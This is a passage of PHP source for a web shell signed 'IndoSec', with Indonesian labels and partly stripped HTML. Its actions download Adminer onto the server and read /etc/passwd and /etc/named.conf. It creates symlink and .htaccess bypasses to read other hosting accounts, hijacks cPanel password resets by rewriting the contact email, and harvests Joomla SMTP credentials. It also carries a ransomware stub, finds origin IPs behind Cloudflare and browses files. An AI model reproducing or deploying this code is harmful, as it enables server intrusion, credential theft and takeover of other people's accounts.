$full = str_replace($_SERVER[‘DOCUMENT_ROOT’], “”, $path);
function adminer($url, $isi) {
$fp = fopen($isi, “w”);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(file_exists(‘adminer.php’)) {
echo “-> adminer login <-

“;
} else {
if(adminer(“https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php”,”adminer.php”)) {
echo “-> adminer login <-
“;
} else {
echo “gagal buat file adminer
“;
}
}
exit;
}

/*
Symlink
*/
if($_GET[‘aksi’] == ‘symlink’) {
if(!is_file(‘named.txt’)){
$d00m = @file(“/etc/named.conf”);
}else{
$d00m = @file(“named.txt”);
}
if(!$d00m) {
die (“[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
Error tidak dapat membaca /etc/named.conf

“);
}
else{
echo “[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]

“;
foreach($d00m as $dom){
if(eregi(“zone”,$dom)){
preg_match_all(‘#zone “(.*)”#’, $dom, $domsws);
flush();
if(strlen(trim($domsws[1][0])) > 2){
$user = posix_getpwuid(@fileowner(“/etc/valiases/”.$domsws[1][0]));
flush();
$site = $user[‘name’] ;
@symlink(“/”,”sym/root”);
$site = $domsws[1][0];
$ir = ‘ir’;
$il = ‘il’;
if (preg_match(“/.^$ir/”,$domsws[1][0]) or preg_match(“/.^$il/”,$domsws[1][0]) ) {
$site = “.$domsws[1][0].”;
}
echo ”

“;
flush();
flush();
}
}
}
echo “

Domains Users symlink
“.$site.” “.$user[‘name’].” Symlink

“;
}
exit;
}

if($_GET[‘aksi’] == ‘symread’) {
echo “read /etc/named.conf”;
echo ”

“;
if(isset($_GET[‘save’])){
$cont = stripcslashes($_POST[‘file’]);
$f = fopen(‘named.txt’,’w’);
$w = fwrite($f,$cont);
if($w){
echo ‘
save has been successfully’;
}
fclose($f);
}
exit;
}

if ($_GET[‘aksi’] == ‘sym_404’){
echo ‘

Symlink 404

File Target:
Save As:

‘;
if($_POST[‘execute’]){
rmdir(“indosec_sym404”);
mkdir(“indosec_sym404”, 0777);
$dir = $_POST[‘dir’];
$isi = $_POST[‘isi’];
system(“ln -s “.$dir.”indosec_sym404/”.$isi);
symlink($dir,”indosec_sym404/”.$isi);
$inija = fopen(“indosec_sym404/.htaccess”, “w”);
fwrite($inija,”ReadmeName “.$isi.”\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain .php\nAddHandler text/plain .php\nSatisfy Any”);
echo’ >>Sukses<< ‘;
}
exit;
}

if ($_GET[‘aksi’] == ‘sym_bypas’){
if(isset($_GET[‘save’]) and isset($_POST[‘file’]) or @filesize(‘passwd.txt’) > 0){
$cont = stripcslashes($_POST[‘file’]);
if(!file_exists(‘passwd.txt’)){
$f = @fopen(‘passwd.txt’,’w’);
$w = @fwrite($f,$cont);
fclose($f);
}
if($w or @filesize(‘passwd.txt’) > 0){
echo “

“;
flush();
$fil3 = file(‘passwd.txt’);
foreach ($fil3 as $f){
$u=explode(‘:’, $f);
$user = $u[‘0’];
echo “

“;
flush();
flush();
}
die (“

Users symlink FTP
$user Symlink FTP

“);
}

}

echo “read /etc/passwd”;
echo “

“;
flush();
exit;
}

if ($_GET[‘aksi’] == ‘resetpasscp’) {
echo ‘

Auto Reset Password Cpanel

‘;

if(isset($_POST[‘submit’])){
$user = get_current_user();
$site = $_SERVER[‘HTTP_HOST’];
$ips = getenv(‘REMOTE_ADDR’);
$email = $_POST[’email’];
$wr = ’email:’.$email;
$f = fopen(‘/home/’.$user.’/.cpanel/contactinfo’, ‘w’);
fwrite($f, $wr);
fclose($f);
$f = fopen(‘/home/’.$user.’/.contactinfo’, ‘w’);
fwrite($f, $wr);
fclose($f);
$parm = $site.’:2082/resetpass?start=1′;
echo ‘
Url: ‘.$parm.”;
echo ‘
Username: ‘.$user.”;
echo ‘
Success Reset To: ‘.$email.’

‘;
}
exit;
}

if ($_GET[‘aksi’] == ‘ransom’) {
echo ‘

‘;

if(isset($_POST[“encrypt”])) {
$dir = $_POST[“path”];
echo”
“;
}
exit;
}

if ($_GET[‘aksi’] == ‘smtpgrab’) {
function scj($path) {
$paths = scandir($path);
foreach($paths as $pathb) {
if(!is_file(“$path/$pathb”)) continue;
$ambil = file_get_contents(“$path/$pathb”);
$ambil = str_replace(“$”, “”, $ambil);
if(preg_match(“/JConfig|joomla/”, $ambil)) {
$smtp_host = ambilkata($ambil,”smtphost = ‘”,”‘”);
$smtp_auth = ambilkata($ambil,”smtpauth = ‘”,”‘”);
$smtp_user = ambilkata($ambil,”smtpuser = ‘”,”‘”);
$smtp_pass = ambilkata($ambil,”smtppass = ‘”,”‘”);
$smtp_port = ambilkata($ambil,”smtpport = ‘”,”‘”);
$smtp_secure = ambilkata($ambil,”smtpsecure = ‘”,”‘”);
echo “

SMTP Host: $smtp_host
SMTP Port: $smtp_port
SMTP User: $smtp_user
SMTP Pass: $smtp_pass
SMTP Auth: $smtp_auth
SMTP Secure: $smtp_secure

“;
}
}
}
echo “

NB : Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/namafolder_config )

“;
$smtp = scj($path);
exit;
}

if ($_GET[‘aksi’] == ‘bypascf’) {
echo ‘

Pilih Metode
ftp
direct-conntect
Webmail
Cpanel

‘;

$target = $_POST[‘target’];

# Bypass From FTP
if($_POST[‘idsPilih’] == “ftp”) {
$ftp = gethostbyname(“ftp.”.”$target”);
echo “

Correct
ip is :
$ftp

“;
}

# Bypass From Direct-Connect
if($_POST[‘idsPilih’] == “direct-conntect”) {
$direct = gethostbyname(“direct-connect.”.”$target”);
echo “

Correct
ip is :
$direct

“;
}

# Bypass From Webmail
if($_POST[‘idsPilih’] == “webmail”) {
$web = gethostbyname(“webmail.”.”$target”);
echo “

Correct
ip is :
$web

“;
}

# Bypass From Cpanel
if($_POST[‘idsPilih’] == “cpanel”) {
$cpanel = gethostbyname(“cpanel.”.”$target”);
echo “

Correct
ip is :
$cpanel

“;
}
exit;
}

if(isset($_GET[‘path’])){
$path = $_GET[‘path’];
chdir($path);
}else{
$path = getcwd();
}
$path = str_replace(‘\\’,’/’,$path);
$paths = explode(‘/’,$path);
echo “
Path : “;
foreach($paths as $id=>$pat){
if($pat == ” && $id == 0){
$a = true;
echo ‘/‘;
continue;
}
if($pat == ”) continue;
echo ‘<a class="link" href="?dir=';
for($i=0;$i’.$pat.’/’;
}
$scandir = scandir($path);
echo ”  [ “.w($dir, perms($dir)).” ]”;
echo ‘

‘;

foreach($scandir as $dir){

/* cek jika ini berbentuk folder */
/* cek jika nama folder karaker terlalu panjang */
if (strlen($dir) > 18) {
$_dir = substr($dir, 0, 18).”…”;
}else{
$_dir = $dir;
}
if(!is_dir($path.’/’.$dir) || $dir == ‘.’ || $dir == ‘..’) continue;
echo

‘;
}

foreach($scandir as $file){

/* cek jika ini berbentuk file */
if(!is_file($path.’/’.$file)) continue;
$size = filesize($path.’/’.$file)/1024;
$size = round($size,3);

if($size >= 1024){
$size = round($size/1024,2).’ MB’;
}else{
$size = $size.’ KB’;
}

echo ‘

‘;
}
echo ‘

File/Folder Size Permission Action
‘.$_dir.’ ‘;
if(is_writable($path.’/’.$dir)) echo ‘‘;
elseif(!is_readable($path.’/’.$dir)) echo ‘‘;
echo perms($path.’/’.$dir);
if(is_writable($path.’/’.$dir) || !is_readable($path.’/’.$dir)) echo ‘
      
‘;

/* cek jika karaker terlalu panjang */
if (strlen($file) > 25) {
$_file = substr($file, 0, 25).”…-.”.$ext;
}else{
$_file = $file;
}

echo’ ‘.$_file.’

‘.$size.’ ‘;
if(is_writable($path.’/’.$file)) echo ‘‘;
elseif(!is_readable($path.’/’.$file)) echo ‘‘;
echo perms($path.’/’.$file);
if(is_writable($path.’/’.$file) || !is_readable($path.’/’.$file)) echo ‘

    
    
    
    
  

Copyright 2019 { IndoSec }
‘;
echo ““;
/*
End
*/
?>